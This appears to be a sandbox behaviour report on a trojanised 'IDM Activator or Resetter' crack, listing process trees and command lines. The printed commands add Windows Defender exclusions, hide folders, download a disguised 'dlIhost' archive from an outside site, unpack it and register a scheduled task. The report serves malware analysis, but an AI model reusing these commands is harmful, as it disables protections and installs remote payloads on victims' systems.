N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2956 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 2956 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 2956 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 3060 wrote to memory of 2812 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe
PID 3060 wrote to memory of 2812 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe
PID 3060 wrote to memory of 2812 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe
PID 3060 wrote to memory of 2812 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe
PID 2812 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2532 wrote to memory of 2432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2532 wrote to memory of 2432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2532 wrote to memory of 2432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2532 wrote to memory of 2440 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2440 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2440 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2440 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2464 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2464 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2464 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2464 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2812 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 1604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 2736 wrote to memory of 1604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 2736 wrote to memory of 1604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 2736 wrote to memory of 1604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 2736 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 2736 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 2736 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 2736 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1980 wrote to memory of 1848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1980 wrote to memory of 1848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1980 wrote to memory of 1848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1980 wrote to memory of 1848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2300 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\IDM 6.xx Activator or Resetter v3.3.rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\IDM 6.xx Activator or Resetter v3.3.rar"

C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe

"C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\main.bat" "

C:\Windows\SysWOW64\attrib.exe

ATTRIB -S +H .

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa IDM0.bat

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa IDM.bat

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa NSudo86x.exe

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa AB2EF.exe

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa UpdateTask.xml

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM0.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat" "

C:\Windows\SysWOW64\reg.exe

REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden"

C:\Windows\SysWOW64\find.exe

FIND /I "1"

C:\Windows\SysWOW64\reg.exe

REG QUERY "HKLM\Hardware\Description\System\CentralProcessor\0"

C:\Windows\SysWOW64\find.exe

FIND /I "x86"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat" r1"

C:\Windows\SysWOW64\attrib.exe

ATTRIB +S +H "C:\Users\Admin\AppData\Roaming\DLL"

C:\Windows\System32\sc.exe

sc query Null

C:\Windows\System32\find.exe

find /i "RUNNING"

C:\Windows\System32\findstr.exe

findstr /v "$" "IDM.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DLL" -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ver

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':PowerShellTest:\s*';iex ($f[1])"

C:\Windows\System32\find.exe

find /i "FullLanguage"

C:\Windows\System32\fltMC.exe

fltmc

C:\Windows\System32\reg.exe

reg query HKCU\Console /v QuickEdit

C:\Windows\System32\find.exe

find /i "0x0"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Property CreationClassName"

C:\Windows\System32\find.exe

find /i "computersystem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value" 2>nul

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionProcess "dlIhost.exe" -Force

C:\Windows\System32\reg.exe

reg query HKU\\Software

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "$explorerProc = Get-Process -Name explorer | Where-Object {$_.SessionId -eq (Get-Process -Id $pid).SessionId} | Select-Object -First 1; $sid = (gwmi -Query ('Select * From Win32_Process Where ProcessID=' + $explorerProc.Id)).GetOwnerSid().Sid; $sid" 2>nul

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$explorerProc = Get-Process -Name explorer | Where-Object {$_.SessionId -eq (Get-Process -Id $pid).SessionId} | Select-Object -First 1; $sid = (gwmi -Query ('Select * From Win32_Process Where ProcessID=' + $explorerProc.Id)).GetOwnerSid().Sid; $sid"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionProcess "NSudo86x.exe" -Force

C:\Windows\System32\reg.exe

reg query HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software

C:\Windows\System32\reg.exe

reg delete HKCU\IAS_TEST /f

C:\Windows\System32\reg.exe

reg delete HKU\S-1-5-21-3452737119-3959686427-228443150-1000\IAS_TEST /f

C:\Windows\System32\reg.exe

reg add HKCU\IAS_TEST

C:\Windows\System32\reg.exe

reg query HKU\S-1-5-21-3452737119-3959686427-228443150-1000\IAS_TEST

C:\Windows\System32\reg.exe

reg delete HKCU\IAS_TEST /f

C:\Windows\System32\reg.exe

reg delete HKU\S-1-5-21-3452737119-3959686427-228443150-1000\IAS_TEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionProcess "7za.exe" -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\System32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v ExePath 2>nul

C:\Windows\System32\reg.exe

reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v ExePath

C:\Windows\System32\reg.exe

reg add HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST

C:\Windows\System32\reg.exe

reg query HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST

C:\Windows\System32\reg.exe

reg delete HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST /f

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command "Invoke-WebRequest 'https://www.crackingcity.com/VScan/dlIhost.7z' -OutFile 'C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z'"

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 3

C:\Windows\System32\mode.com

mode 113, 35

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=34;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Red"' -fore '"white"' '"IDM [Internet Download Manager] is not Installed."'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command "(New-Object System.Net.WebClient).DownloadFile('https://www.crackingcity.com/VScan/dlIhost.7z', 'C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z')"

C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe

NSudo86x -U:C -P:E -UseCurrentConsole "C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /onboot

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Yellow"' '"Press any key to return..."'

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e "C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z" -o"C:\Users\Admin\AppData\Roaming\DLL" -pun#912345678@rar -aoa

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /xml ".\UpdateTask.xml" /tn "UpdateTask" /f

C:\Windows\System32\mode.com

mode 113, 35

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=34;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Red"' -fore '"white"' '"IDM [Internet Download Manager] is not Installed."'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Yellow"' '"Press any key to return..."'

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Windows\System32\mode.com

mode 113, 35

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=34;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"

C:\Windows\System32\tasklist.exe

tasklist /fi "imagename eq idman.exe"

C:\Windows\System32\findstr.exe

findstr /i "idman.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"

C:\Windows\System32\reg.exe

reg export HKCU\Software\Classes\Wow6432Node\CLSID "C:\Windows\Temp\_Backup_HKCU_CLSID_20240414-022842780.reg"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "FName"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LName"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "Email"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "Serial"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "scansk"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "tvfrdt"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "radxcnt"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LstCheck"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "ptrk_scdt"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LastCheckQU"

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$sid = 'S-1-5-21-3452737119-3959686427-228443150-1000'; $HKCUsync = 1; $lockKey = $null; $deleteKey = 1; $f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':regscan\:.*';iex ($f[1])"

C:\Windows\System32\reg.exe

reg add "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager" /v "AdvIntDriverEnabled2" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"DarkGreen"' -fore '"white"' '"The IDM reset process has been completed."'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Yellow"' '"Press any key to return..."'

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.internetdownloadmanager.com/download.html

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1640 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\idman642build7.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\idman642build7.exe"

C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp

"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Program Files (x86)\Internet Download Manager\idmBroker.exe

"C:\Program Files (x86)\Internet Download Manager\idmBroker.exe" -RegServer

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /rtr

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.internetdownloadmanager.com/support/installffextfrommozillasite.html

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.internetdownloadmanager.com/support/installffextfrommozillasite.html

C:\Program Files (x86)\Internet Download Manager\Uninstall.exe

"C:\Program Files (x86)\Internet Download Manager\Uninstall.exe" -instdriv

C:\Windows\system32\RUNDLL32.EXE

"C:\Windows\Sysnative\RUNDLL32.EXE" SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\Program Files (x86)\Internet Download Manager\idmwfp.inf

C:\Program Files\Mozilla Firefox\firefox.exe

